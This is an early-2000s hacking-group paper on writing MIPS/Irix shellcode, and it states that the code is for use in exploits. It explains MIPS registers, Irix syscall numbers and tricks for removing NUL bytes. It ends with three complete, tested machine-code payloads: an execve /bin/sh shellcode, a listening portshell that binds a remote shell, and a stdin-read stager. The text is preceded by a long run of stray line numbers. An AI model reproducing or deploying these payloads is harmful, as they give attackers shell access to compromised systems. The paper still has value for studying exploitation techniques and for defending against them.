1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
|
0020 2000/03/29 Writing MIPS/Irix shellcode
==== TESO Informational =======================================================
This piece of information is to be kept confidential.
===============================================================================
Description ..........: Writing MIPS/Irix shellcode
Date .................: 2000/03/29 17:00
Author ...............: scut
Publicity level ......: known
Affected .............: MIPS/Irix shellcode
Type of entity .......: technique
Type of discovery ....: useful information
Severity/Importance ..: low
Found by .............: Last Stage of Delirium, DCRH, scut
===============================================================================
Writing shellcode for the MIPS/Irix platform isn't much different then writing
shellcode for the x86 architecture. But there are a few tricks and things to
obey when attempting to make clean shellcode, which doesn't have any NUL bytes
and works completely independent from it's position.
This small paper will provide you a crash course on writing IRIX shellcode for
use in exploits. It covers the basic stuff you need to know to start away
writing basic IRIX shellcode. It is divided into the following sections:
The IRIX operating system
MIPS architecture
MIPS instructions
MIPS registers
The MIPS assembly language
High level language function representation
Syscalls and Exceptions
IRIX syscalls
Common constructs
Tuning the shellcode
Example shellcode
References
The IRIX operating system
=========================
The Irix operating system has been developed independently by Silicon Graphics
and is UNIX System V.4 compliant. It has been designed for MIPS CPU's, which
have a unique history and have pioneered 64bit- and RISC-technology. The
current Irix version is 6.5.7. There are two major versions, called feature
(6.5.7f) and maintenance (6.5.7m) release, from which the feature release is
focused on new features and technologies and the maintenance release on bug
fixes and stability. All modern Irix platforms are binary compatible and this
shellcode discussion and the example shellcodes have been tested on over half a
dozen different Irix computer systems.
MIPS architecture
=================
First of all you have to have some basic knowledge about the MIPS CPU
architecture. There are a lot of different types of the MIPS CPU, the most
common are the R4x00 and R10000 series, which share the same instruction set.
The MIPS CPU' are typical RISC CPU's, that means they have a reduced
instruction set with less instructions then CISC CPU's, such as x86. The main
concept of RISC CPU's is a tradeoff between simplicity and concurrency: There
are less instructions, but the existing ones can be executed fast and in
parallel. Because of this small number of instructions there is less redundancy
per instruction, some things can only be done using a single instruction, while
on CISC CPU's it is possible in many ways utilizing many different
instructions. This also results in MIPS machine code being larger, since often
multiple instructions are required to accomplish things CISC CPU's are able to
do with one instruction.
But this does not mean that multiple instructions also result in slower code.
This is a matter of overall execution speed, which is extremely high because
of the parallel execution of the instructions.
On MIPS CPU's the concurrency is very advanced, the CPU has a pipeline with
five slots, which means five instructions are processed in parallel and every
instruction has five stages, from the initial IF pipestage (instruction fetch)
to the last, the WB pipestage (write back).
Because the instructions within the pipeline overlap there are some "anomalies"
that have to be considered when writing MIPS machine code:
- there is a branch delay slot, where one instruction after the branch
(or jump) instruction is still in the pipeline and executed
- the return address for subroutines ($ra) and syscalls (C0_EPC) points
not to the instruction after the branch/jump/syscall instruction but to
the instruction after the branch delay slot instruction
- since every instruction is divided into five pipestages the MIPS design
has reflected this on the instructions itself: every instruction is
32 bits broad (4 bytes), and can be divided most of the times into
segments which correspond with each pipestage
MIPS instructions
=================
MIPS instructions are not just 32 bit long each, they often share a similar
mapping too. An instruction can be divided into the following sections:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
31302928272625242322212019181716151413121110 9 8 7 6 5 4 3 2 1 0
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| op | sub-op |xxxxxxxxxxxxxxxxxxxxxxxxxxxxx| subcode |
+-----------+---------+-----------------------------+-----------+
The "op" field denotes the 6bit long primary opcode. Some instructions, such
as long jumps (see below) have a unique code here, the rest are grouped by
function. The "sub-op" section, which is five bytes long can represent either
a specific sub opcode as extension to the primary opcode or can be a register
block. A register block is always 5 bits long and selects one of the CPU
registers for an operation. The subcode is the opcode for the arithmetic and
logical instructions, which have a primary opcode of zero.
The logical and arithmetic instructions share a RISC-unique attribute: They
don't work with two registers, such as common x86 instructions, but they use
three registers, named "destination", "target" and "source". This allows more
flexible code to be written, if you still want CISC type instructions, such
as "add %eax, %ecx", just use the same destination and target register for the
operation.
A typical MIPS instruction looks like:
or a0, a1, t4
which is easy to represent in C as "a0 = a1 | t4". The order is almost every
time equivalent to a simple C expression. For the complete list of instructions
see either [1] or [2].
MIPS registers
==============
For the MIPS registers, it has plenty of 'em. Since we already know registers
are addressed using a 5 bit block, there must be 32 registers, and yes, we're
right, there are the registers $0 to $31. They are all alike except for $0 and
$31. For $0 the case is very simple: No matter what you do to the registers,
it always contains zero. This is practical for a lot of arithmetic instructions
and can results in elegant code design. The $0 register has been assigned the
symbolic name $zero, guess why :-)
For the $31 register, it's also called $ra, for "return address". Why should
a register ever contain a return address if there is such a nice thing as a
stack to store it, how should recursion be handled otherwise ? Well, the short
answer is, there is no real stack and yes it works.
For the longer answer we will discuss shortly what happens when a function is
called on a RISC CPU. When this is done a special instruction called "jal" is
used. This instruction overwrites the content of the $ra ($31) register with
the appropriate return address and then jumps to an arbitrary address. The
called function however sees the return address in $ra and once finished just
jumps back (using the "jr" instruction) to the return address. But what if the
function wants to to call functions too ? Then there is a stack like segment
it can store the return address on, later restore it and then continue to work
as usual.
Why "stack like" ? Because there is only a stack by convention, any register
may be used to behave like a stack. There are no push or pop instructions
however, the register has to be adjusted manually. The "stack" register is $29,
symbolically referenced as $sp.
Are there other register conventions ? Yes, nearly as many as registers
itself. For the sake of completeness here is a small listing:
$0 $zero always contains zero
$1 $at is used by assembler (see below), do not use
$2-$3 $v0, $v1 subroutine return values
$4-$7 $a0-$a3 subroutine arguments
$8-$15 $t0-$t7 temporary registers, may be overwritten by subroutine
$16-$23 $s0-$s7 subroutine registers, have to be saved by called function
before they may be used
$24,$25 $t8, $t9 temporary registers
$26,$27 $k0, $k1 interrupt/trap handler reserved registers, do not use
$28 $gp global pointer, used to access static and extern variables
$29 $sp stack pointer
$30 $s8/$fp subroutine register, commonly used as a frame pointer
$31 $ra return address
The MIPS assembly language
==========================
Because the instructions are relatively primitive but programmers often want to
accomplish more complex things, the MIPS assembly language works with a lot of
macro instructions. They provide sometimes really necessary operations such as
subtracting a number from a register (which is converted to a signed add by the
assembler) to complex macros, such as finding the remainder for a division.
But the assembler does a lot more then providing macros for common operations.
We already mentioned the pipeline where instructions are processed in parallel.
The execution often directly depends on the order within the pipeline, because
the registers accessed with the instructions are written back in the last
pipestage, the WB (write-back) stage and cannot be accessed before by other
instructions. For old MIPS CPU's the MIPS abbreviation is true when saying
"Microcomputer without Interlocked Pipeline Stages", you just cannot access the
register in the instruction directly following the one that modifies this
register. Nearly all MIPS CPU's currently in use do have a interlock though,
they just wait until the data from the instruction is written back to the
register before allowing the following instruction to read it.
In practice you only have to worry when writing very low level assemble code,
such as shellcode :-), because most of the times the assembler will reorder and
replace your instructions so that they exploit the pipelined architecture at
best. You can turnoff the reordering and macros in any MIPS assembler if you
want to.
The MIPS CPU's and RISC CPU's altogether weren't designed for easy assembly
language programming. It is more difficult to program a RISC CPU in assembly
then any CISC CPU. Even the first sentences of the MIPS Pro Assembler Manual
from the MIPS corporation recommend to use MIPS assembly language only for
hardware near routines or operating system programming. In most cases a good
C compiler, such as the one SGI developed will optimize the pipeline and
register usage way better then any programmer might do this in assembly.
However, when writing shellcodes we have to face the bare machine code and
have to write size optimized code which doesn't contain any NUL bytes. A
compiler might use large code to unroll loops or to use faster constructs.
High level language function representation
===========================================
A normal C function can be represented very easily in MIPS assembly most of
the times. You have to differentiate between leaf and non-leaf functions. A
non-leaf function is a function that does not call any other functions. Such
functions do not need to store the return address on the stack, but keep it in
$ra for the whole time. The arguments to a function are stored by the calling
function in $a0, $a1, $a2 and $a3. If this space isn't enough extra stack space
is used, but in most cases the registers suffice. The function may return two
32bit values through the $v0 and $v1 registers. For temporary space the called
function may use the stack referenced by $sp. Also registers are commonly saved
on the stack and later restored from it. The stack usually starts at 0x80000000
and grows towards small addresses. It is very similar to the stack of a x86
system.
Syscalls and Exceptions
=======================
On a typical Unix system there are only two modes the current execution can
happen in: The user and the kernel mode. In most modern architectures this
modes are directly supported by the CPU. The MIPS CPU has this two modes plus
an extra mode called "supervisor mode". It was requested by engineers at DEC
for their new range of Workstations when the MIPS R4000 CPU was designed. Since
the VMS/DEC market was important to MIPS they implemented this third mode at
DEC's request to allow the VMS operating system to be run on the CPU. However,
DEC decided later to develop their own CPU, the Alpha CPU and the mode
remained unused.
Back to the execution modes, on current operating systems designed for the
MIPS CPU only the kernel and user mode is being used. To switch from the user
mode to the kernel mode there is a mechanism called "exceptions". Whenever
a user space process wants to let the kernel to do something or whenever the
current execution can't be successfully continued the control is passed to the
kernel space exception handler.
For shellcode construction we have to know that we can make the kernel
execute important operating system related stuff like I/O operations through
the syscall exception, which is triggered through the "syscall" instruction.
The syscall instruction looks like:
syscall 0000.00xx xxxx.xxxx xxxx.xxxx xx00.1100
Where the x's represent the syscall code, which is ignored on the Irix system.
To avoid NUL bytes you can set those x-bits to arbitrary data.
IRIX syscalls
=============
The following list covers the most important syscalls for use in shellcodes.
After all registers have been appropiatly set the "syscall" instruction is
executed and the execution flow is passed to the kernel.
== accept
int accept (int s, struct sockaddr *addr, socklen_t *addrlen);
a0 = (int) s
a1 = (struct sockaddr *) addr
a2 = (socklen_t *) addrlen
v0 = SYS_accept = 1089 = 0x0441
return values
a3 = 0 success, a3 != 0 on failure
v0 = new socket
== bind
int bind (int sockfd, struct sockaddr *my_addr, socklen_t addrlen);
a0 = (int) sockfd
a1 = (struct sockaddr *) my_addr
a2 = (socklen_t) addrlen
v0 = SYS_bind = 1090 = 0x0442
For the IN protocol family (TCP/IP) the sockaddr pointer points to a
sockaddr_in struct which is 16 bytes long and typically looks like:
"\x00\x02\xaa\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
where aa is ((port >> 8) & 0xff) and bb is (port & 0xff).
return values
a3 = 0 success, a3 != 0 on failure
v0 = 0 success, v0 != 0 on failure
== close
int close (int fd);
a0 = (int) fd
v0 = SYS_close = 1006 = 0x03ee
return values
a3 = 0 success, a3 != 0 on failure
v0 = 0 success, v0 != 0 on failure
== execve
int execve (const char *filename, char *const argv [], char *const envp[]);
a0 = (const char *) filename
a1 = (chat * const) argv[]
a2 = (char * const) envp[]
v0 = SYS_execve = 1059 = 0x0423
return values
shouldn't return but replace current process with program, it only returns
in case of errors
== fcntl
int fcntl (int fd, int cmd);
int fcntl (int fd, int cmd, long arg);
a0 = (int) fd
a1 = (int) cmd
a2 = (long) arg in case the command requires an argument
v0 = SYS_fcntl = 1062 = 0x0426
return values
a3 = 0 on success, a3 != 0 on failure
v0 is the real return value and depends on the operation, see fcntl(2) for
further information
== listen
int listen (int s, int backlog);
a0 = (int) s
a1 = (int) backlog
v0 = SYS_listen = 1096 = 0x0448
return values
a3 = 0 on success, a3 != 0 on failure
== read
ssize_t read (int fd, void *buf, size_t count);
a0 = (int) fd
a1 = (void *) buf
a2 = (size_t) count
v0 = SYS_read = 1003 = 0x03eb
return values
a3 = 0 on success, a3 != 0 on failure
v0 = number of bytes read
== socket
int socket (int domain, int type, int protocol);
a0 = (int) domain
a1 = (int) type
a2 = (int) protocol
v0 = SYS_socket = 1107 = 0x0453
return values
a3 = 0 on success, a3 != 0 on failure
v0 = new socket
The dup2 functionality isn't implemented as system call but as libc wrapper for
close and fcntl. Basically the dup2 function looks like (simplified):
int dup2 (int des1, int des2) {
int tmp_errno,
maxopen;
maxopen = (int) ulimit (4, 0);
if (maxopen < 0)
maxopen = OPEN_MAX;
if (fcntl (des1, F_GETFL, 0) == -1)
_setoserror (EBADF);
return -1;
}
if (des2 >= maxopen || des2 < 0) {
_setoserror (EBADF);
return -1;
}
if (des1 == des2)
return des2;
tmp_errno = _oserror();
close (des2);
_setoserror (tmp_errno);
return (fcntl (des1, F_DUPFD, des2));
}
So without the validation dup2 (des1, des2) can be rewritten as:
close (des2);
fcntl (des1, F_DUPFD, des2);
Which has been done in the portshell shellcode below.
Common constructs
=================
When writing shellcode there are always common operations, like getting the
current address. Here are a few techniques that you can use in your shellcodes:
== Getting the current address
li t8, -0x7350 /* load t8 with -0x7350 (leet) */
foo: bltzal t8, foo /* branch with $ra stored if t8 < 0 */
slti t8, zero, -1 /* t8 = 0 (see below) */
bar:
Because the slti instruction is in the branch delay slot when the bltzal is
executed the next time the bltzal won't branch and t8 will remain zero. $ra
holds the address of the bar label when the label is reached.
== Loading small integer values
Because every instruction is 32 bits long you cannot immediately load a 32 bit
value into a register but you have to use two instructions. Most of the times,
however, you just want to load small values, below 256. Values below 2^16 are
stored as 16 bit value within the instruction and values below 256 will result
in ugly NUL bytes, that should be avoided in proper shellcodes. Therefore we
use a trick to load such small values:
loading zero into reg:
slti reg, zero, -1
loading one into reg:
slti reg, zero, 0x0101
loading small integer values into reg:
li t8, -valmod /* valmod = value + 1 */
not reg, t8
For example if we want to load 4 into reg we would use:
li t8, -5
not reg, t8
In case you need small values more then one time you can also store them into
saved registers ($s0 - $s7, optionally $s8).
== Moving registers
In normal MIPS assembly you'd use the simple move instruction, which results in
an "or" instruction, but in shellcode you have to avoid NUL bytes, and you can
use this construction, if you know that the value in the register is below
0xffff:
andi reg, source, 0xffff
Tuning the shellcode
====================
I recommend that you write your shellcodes in normal MIPS assembly and
afterwards start removing the NUL bytes from top to bottom. For simple load
instructions you can use the constructs above. For essential instructions try
to play with the different registers, in some cases NUL bytes may be removed
from arithmetic and logic instructions by using higher registers, such as $t8
or $s7. Next try replacing the single instruction with two or three
accomplishing the same. Make use of the return values of syscalls or known
register contents. Be creative, use a MIPS instruction reference from [1] or
[2] and your brain and you'll always find a good replacement.
Once you made your shellcode NUL free you'll notice the size has increased and
your shellcode is quite bloated. Don't worry, this is normal, there is almost
nothing you can do about it, RISC code is nearly always larger then the same
code on x86. But you can do some small optimizations to decrease the size. At
first try to find replacements for instruction blocks, where more then one
instruction is used to do one thing. Always take a look at the current register
content and make use of return values or previously loaded values. Sometimes
reordering saves you from doing jumps.
Example shellcode
=================
All the shellcodes have been tested on the following systems, (thanks to vax,
oxigen, zap and hendy):
R4000/6.2, R4000/6.5, R4400/5.3, R4400/6.2, R4600/5.3, R5000/6.5 and R10000/6.4.
== execve
/* 68 byte MIPS/Irix PIC execve shellcode. -scut/teso
*/
unsigned long int shellcode[] = {
0xafa0fffc, /* sw $zero, -4($sp) */
0x24067350, /* li $a2, 0x7350 */
/* dpatch: */ 0x04d0ffff, /* bltzal $a2, dpatch */
0x8fa6fffc, /* lw $a2, -4($sp) */
/* a2 = (char **) envp = NULL */
0x240fffcb, /* li $t7, -53 */
0x01e07827, /* nor $t7, $t7, $zero */
0x03eff821, /* addu $ra, $ra, $t7 */
/* a0 = (char *) pathname */
0x23e4fff8, /* addi $a0, $ra, -8 */
/* fix 0x42 dummy byte in pathname to shell */
0x8fedfffc, /* lw $t5, -4($ra) */
0x25adffbe, /* addiu $t5, $t5, -66 */
0xafedfffc, /* sw $t5, -4($ra) */
/* a1 = (char **) argv */
0xafa4fff8, /* sw $a0, -8($sp) */
0x27a5fff8, /* addiu $a1, $sp, -8 */
0x24020423, /* li $v0, 1059 (SYS_execve) */
0x0101010c, /* syscall */
0x2f62696e, /* .ascii "/bin" */
0x2f736842, /* .ascii "/sh", .byte 0xdummy */
};
== portshell (listening)
/* 364 byte MIPS/Irix PIC listening portshell shellcode. -scut/teso
*/
unsigned long int shellcode[] = {
0x2416fffd, /* li $s6, -3 */
0x02c07027, /* nor $t6, $s6, $zero */
0x01ce2025, /* or $a0, $t6, $t6 */
0x01ce2825, /* or $a1, $t6, $t6 */
0x240efff9, /* li $t6, -7 */
0x01c03027, /* nor $a2, $t6, $zero */
0x24020453, /* li $v0, 1107 (socket) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x3050ffff, /* andi $s0, $v0, 0xffff */
0x280d0101, /* slti $t5, $zero, 0x0101 */
0x240effee, /* li $t6, -18 */
0x01c07027, /* nor $t6, $t6, $zero */
0x01cd6804, /* sllv $t5, $t5, $t6 */
0x240e7350, /* li $t6, 0x7350 (port) */
0x01ae6825, /* or $t5, $t5, $t6 */
0xafadfff0, /* sw $t5, -16($sp) */
0xafa0fff4, /* sw $zero, -12($sp) */
0xafa0fff8, /* sw $zero, -8($sp) */
0xafa0fffc, /* sw $zero, -4($sp) */
0x02102025, /* or $a0, $s0, $s0 */
0x240effef, /* li $t6, -17 */
0x01c03027, /* nor $a2, $t6, $zero */
0x03a62823, /* subu $a1, $sp, $a2 */
0x24020442, /* li $v0, 1090 (bind) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x02102025, /* or $a0, $s0, $s0 */
0x24050101, /* li $a1, 0x0101 */
0x24020448, /* li $v0, 1096 (listen) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x02102025, /* or $a0, $s0, $s0 */
0x27a5fff0, /* addiu $a1, $sp, -16 */
0x240dffef, /* li $t5, -17 */
0x01a06827, /* nor $t5, $t5, $zero */
0xafadffec, /* sw $t5, -20($sp) */
0x27a6ffec, /* addiu $a2, $sp, -20 */
0x24020441, /* li $v0, 1089 (accept) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x3057ffff, /* andi $s7, $v0, 0xffff */
0x2804ffff, /* slti $a0, $zero, -1 */
0x240203ee, /* li $v0, 1006 (close) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x02f72025, /* or $a0, $s7, $s7 */
0x2805ffff, /* slti $a1, $zero, -1 */
0x2806ffff, /* slti $a2, $zero, -1 */
0x24020426, /* li $v0, 1062 (fcntl) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x28040101, /* slti $a0, $zero, 0x0101 */
0x240203ee, /* li $v0, 1006 (close) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x02f72025, /* or $a0, $s7, $s7 */
0x2805ffff, /* slti $a1, $zero, -1 */
0x28060101, /* slti $a2, $zero, 0x0101 */
0x24020426, /* li $v0, 1062 (fcntl) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 */
0x02c02027, /* nor $a0, $s6, $zero */
0x240203ee, /* li $v0, 1006 (close) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x02f72025, /* or $a0, $s7, $s7 */
0x2805ffff, /* slti $a1, $zero, -1 */
0x02c03027, /* nor $a2, $s6, $zero */
0x24020426, /* li $v0, 1062 (fcntl) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0xafa0fffc, /* sw $zero, -4($sp) */
0x24068cb0, /* li $a2, -29520 */
0x04d0ffff, /* bltzal $a2, pc-4 */
0x8fa6fffc, /* lw $a2, -4($sp) */
0x240fffc7, /* li $t7, -57 */
0x01e07827, /* nor $t7, $t7, $zero */
0x03eff821, /* addu $ra, $ra, $t7 */
0x23e4fff8, /* addi $a0, $ra, -8 */
0x8fedfffc, /* lw $t5, -4($ra) */
0x25adffbe, /* addiu $t5, $t5, -66 */
0xafedfffc, /* sw $t5, -4($ra) */
0xafa4fff8, /* sw $a0, -8($sp) */
0x27a5fff8, /* addiu $a1, $sp, -8 */
0x24020423, /* li $v0, 1059 (execve) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x2f62696e, /* .ascii "/bin" */
0x2f736842, /* .ascii "/sh", .byte 0xdummy */
};
== read
/* 40 byte MIPS/Irix PIC stdin-read shellcode. -scut/teso
*/
unsigned long int shellcode[] = {
0x24048cb0, /* li $a0, -0x7350 */
/* dpatch: */ 0x0490ffff, /* bltzal $a0, dpatch */
0x2804ffff, /* slti $a0, $zero, -1 */
0x240fffe3, /* li $t7, -29 */
0x01e07827, /* nor $t7, $t7, $zero */
0x03ef2821, /* addu $a1, $ra, $t7 */
0x24060201, /* li $a2, 0x0201 (513 bytes) */
0x240203eb, /* li $v0, SYS_read */
0x0101010c, /* syscall */
0x24187350, /* li $t8, 0x7350 (nop) */
};
References
==========
For further information you may want to consult this excellent references:
[1] See MIPS Run
Dominic Sweetman, Morgan Kaufmann Publishers
ISBN 1-55860-410-3
[2] MIPSPro Assembly Language Programmer's Guide - Volume 1/2
Document Number 007-2418-001
http://www.mips.com/ and http://www.sgi.com/
===============================================================================
|